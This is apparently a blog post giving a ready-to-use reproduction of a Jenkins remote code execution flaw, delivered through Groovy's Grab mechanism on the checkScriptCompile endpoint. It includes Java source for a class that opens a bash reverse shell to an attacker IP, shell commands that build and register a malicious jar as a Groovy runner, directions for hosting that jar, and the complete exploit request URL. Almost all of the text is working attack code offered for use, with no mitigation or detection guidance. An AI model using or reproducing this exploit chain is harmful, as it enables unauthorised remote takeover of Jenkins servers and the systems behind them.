Preface: for the vulnerability details, search for the CVE number; this post goes straight to reproducing it.
1. Build a jar whose class spawns a reverse bash shell, and host it on a public server so the target can fetch it. Save the following as jkrce.java:
public class jkrce {
    // Groovy's runner registry instantiates every class named in
    // META-INF/services/org.codehaus.groovy.plugins.Runners, so this
    // constructor runs as soon as the grabbed jar is loaded.
    public jkrce() {
        try {
            // attacker IP and listener port
            String payload = "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1";
            String[] cmds = { "/bin/bash", "-c", payload };
            java.lang.Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            // swallowed on purpose: a failed callback must not surface as a compile error
        }
    }
}
2. Create the directory META-INF/services/ (note the spelling: services), compile the class, and write its name into META-INF/services/org.codehaus.groovy.plugins.Runners. That service file is what makes Groovy instantiate jkrce, and therefore run its constructor, when the jar is loaded:
javac jkrce.java                  # compile
mkdir -p META-INF/services/       # create the services directory
echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners   # register the class as a Groovy runner
jar cvf jenkins-1.jar jkrce.class META-INF   # package; the name must be <module>-<version>.jar
3. On the public server, create the path tools/jenkins/1/ under the web root and copy jenkins-1.jar into it:
mkdir -p /home/wwwroot/default/tools/jenkins/1/   # lnmp web root; the path must be exactly this
The path has to match the @Grab coordinates in the PoC: Grape resolves group='tools', module='jenkins', version='1' to <resolver root>/tools/jenkins/1/jenkins-1.jar. If you change the coordinates in the PoC, change the directory and the jar name to match.
4. PoC: replace xxx.xxx.xxx.xxx with the public IP of your server; nothing else needs changing. In the query string, %0a is the newline between the annotation lines and %27 is a single quote:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport jkrce;
With a listener waiting on port 2333, send the request and wait for the reverse shell. On success the web page returns the following; note that "success" only means the script compiled, so the callback on the listener is the real confirmation:
{"column":0,"line":0,"message":"","status":"success"}